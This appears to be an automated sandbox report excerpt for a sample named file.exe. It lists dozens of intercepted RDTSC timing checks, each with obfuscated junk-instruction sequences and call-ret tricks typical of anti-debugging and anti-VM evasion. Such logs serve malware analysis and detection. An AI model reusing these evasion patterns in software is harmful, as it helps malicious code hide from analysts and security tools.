                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6C4D second address: DB6C67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30BBDF96h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBBA15 second address: DBBA5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A30F498D2h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F3A30F498CDh 0x00000010 popad 0x00000011 pushad 0x00000012 push esi 0x00000013 pop esi 0x00000014 jmp 00007F3A30F498CEh 0x00000019 jmp 00007F3A30F498D0h 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBC0D9 second address: DBC0DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBC0DF second address: DBC0E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBD04D second address: DBD052 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBC23F second address: DBC266 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3A30F498D6h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007F3A30F498C6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBC266 second address: DBC287 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30BBDF99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBC287 second address: DBC32D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F3A30F498C8h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 jmp 00007F3A30F498D7h 0x00000027 push dword ptr fs:[00000000h] 0x0000002e stc 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 push 00000000h 0x00000038 push ebp 0x00000039 call 00007F3A30F498C8h 0x0000003e pop ebp 0x0000003f mov dword ptr [esp+04h], ebp 0x00000043 add dword ptr [esp+04h], 0000001Ch 0x0000004b inc ebp 0x0000004c push ebp 0x0000004d ret 0x0000004e pop ebp 0x0000004f ret 0x00000050 mov dword ptr [ebp+122D2675h], ebx 0x00000056 mov ebx, dword ptr [ebp+122D1860h] 0x0000005c mov eax, dword ptr [ebp+122D1529h] 0x00000062 or dword ptr [ebp+122D1C32h], edi 0x00000068 push FFFFFFFFh 0x0000006a jo 00007F3A30F498C9h 0x00000070 movsx edi, dx 0x00000073 push eax 0x00000074 push eax 0x00000075 push edx 0x00000076 pushad 0x00000077 jnp 00007F3A30F498C6h 0x0000007d jp 00007F3A30F498C6h 0x00000083 popad 0x00000084 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBDF9A second address: DBDF9F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBDF9F second address: DBDFB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3A30F498D0h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBDFB9 second address: DBE02E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3A30BBDF8Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F3A30BBDF88h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 adc bx, BFF0h 0x0000002a mov di, ax 0x0000002d mov di, bx 0x00000030 push 00000000h 0x00000032 pushad 0x00000033 jmp 00007F3A30BBDF92h 0x00000038 mov ebx, dword ptr [ebp+122D297Fh] 0x0000003e popad 0x0000003f push 00000000h 0x00000041 je 00007F3A30BBDF92h 0x00000047 jng 00007F3A30BBDF8Ch 0x0000004d xchg eax, esi 0x0000004e push eax 0x0000004f push edx 0x00000050 push ebx 0x00000051 pushad 0x00000052 popad 0x00000053 pop ebx 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC27F2 second address: DC27F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC4B77 second address: DC4B7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC5CBC second address: DC5CC6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3A30F498C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC5CC6 second address: DC5CEF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3A30BBDF9Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC5CEF second address: DC5D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F3A30F498CCh 0x0000000b popad 0x0000000c nop 0x0000000d mov di, bx 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F3A30F498C8h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c push eax 0x0000002d pop ebx 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007F3A30F498C8h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 00000018h 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a xchg eax, esi 0x0000004b push eax 0x0000004c push edx 0x0000004d jng 00007F3A30F498DCh 0x00000053 jmp 00007F3A30F498D6h 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC6E3C second address: DC6E40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC2A8D second address: DC2A9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A30F498CEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC3AE8 second address: DC3B03 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3A30BBDF8Ch 0x00000008 jp 00007F3A30BBDF86h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007F3A30BBDF88h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC03C7 second address: DC03CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC7F3E second address: DC7F53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F3A30BBDF86h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 push esi 0x00000013 pop esi 0x00000014 pop esi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC708D second address: DC70B7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F3A30F498CAh 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F3A30F498D2h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC8DF6 second address: DC8E90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30BBDF99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c sub bh, 00000071h 0x0000000f push 00000000h 0x00000011 sub ebx, 04C49483h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007F3A30BBDF88h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 mov bx, BA9Bh 0x00000037 xchg eax, esi 0x00000038 jc 00007F3A30BBDF8Ah 0x0000003e push esi 0x0000003f push ebx 0x00000040 pop ebx 0x00000041 pop esi 0x00000042 push eax 0x00000043 pushad 0x00000044 pushad 0x00000045 jmp 00007F3A30BBDF90h 0x0000004a jmp 00007F3A30BBDF94h 0x0000004f popad 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F3A30BBDF8Fh 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC8163 second address: DC8167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC906C second address: DC9071 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCD6EF second address: DCD6F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D63594 second address: D6359D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6359D second address: D635A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D635A1 second address: D635BD instructions: 0x00000000 rdtsc 0x00000002 js 00007F3A30BBDF86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3A30BBDF90h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D635BD second address: D635DB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F3A30F498CCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 jbe 00007F3A30F498C6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D635DB second address: D635DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD06BD second address: DD0717 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3A30F498CFh 0x00000008 jmp 00007F3A30F498D9h 0x0000000d push edi 0x0000000e pop edi 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 jno 00007F3A30F498CAh 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F3A30F498D4h 0x00000023 js 00007F3A30F498C6h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD0717 second address: DD071D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD071D second address: DD0723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD0723 second address: DD0727 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD0727 second address: DD072D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD0849 second address: DD084F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD084F second address: DD0868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3A30F498CCh 0x0000000a jo 00007F3A30F498D2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD0868 second address: DD086E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD9932 second address: DD9955 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30F498D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDDDC7 second address: DDDDE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30BBDF90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDDF34 second address: DDDF3E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3A30F498C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDDF3E second address: DDDF58 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3A30BBDF94h 0x00000008 jmp 00007F3A30BBDF8Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDDF58 second address: DDDF69 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3A30F498C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE09E second address: DDE0A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE0A2 second address: DDE0BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30F498D3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE0BE second address: DDE0C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE0C4 second address: DDE0CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE0CB second address: DDE0EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007F3A30BBDF86h 0x0000000b jmp 00007F3A30BBDF8Dh 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push ebx 0x00000014 pushad 0x00000015 push eax 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE232 second address: DDE23C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE547 second address: DDE566 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A30BBDF8Bh 0x00000009 jmp 00007F3A30BBDF90h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE566 second address: DDE56C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE6BC second address: DDE6C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE6C0 second address: DDE6CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE805 second address: DDE80B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE80B second address: DDE811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE4A50 second address: DE4A67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30BBDF91h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE4A67 second address: DE4A6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE4A6B second address: DE4A93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F3A30BBDF86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3A30BBDF94h 0x00000015 push esi 0x00000016 pushad 0x00000017 popad 0x00000018 pop esi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE3852 second address: DE3870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A30F498D8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB580A second address: DB5823 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jno 00007F3A30BBDF86h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 jnl 00007F3A30BBDF86h 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE3B17 second address: DE3B31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F3A30F498D1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE3B31 second address: DE3B49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jns 00007F3A30BBDF8Eh 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE3CB4 second address: DE3CBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE4079 second address: DE407D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE407D second address: DE4098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3A30F498D1h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE4098 second address: DE409C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE41E4 second address: DE421B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30F498D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F3A30F498D5h 0x00000011 jno 00007F3A30F498C6h 0x00000017 push edx 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE421B second address: DE4220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE4220 second address: DE4240 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30F498D9h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE79EC second address: DE79F2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D65199 second address: D6519D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6519D second address: D651B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30BBDF95h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEDC8C second address: DEDCB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A30F498D1h 0x00000009 jmp 00007F3A30F498D3h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEDCB6 second address: DEDCBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEDCBB second address: DEDCDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30F498CAh 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jbe 00007F3A30F498C6h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEDCDD second address: DEDCE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEE239 second address: DEE23D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEE23D second address: DEE241 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEE8CC second address: DEE8D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEE8D0 second address: DEE8D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEE8D4 second address: DEE90C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jg 00007F3A30F498ECh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEE90C second address: DEE921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A30BBDF91h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEEE11 second address: DEEE15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DED4E4 second address: DED4E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DED4E8 second address: DED504 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30F498D3h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DED504 second address: DED50A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DED50A second address: DED510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
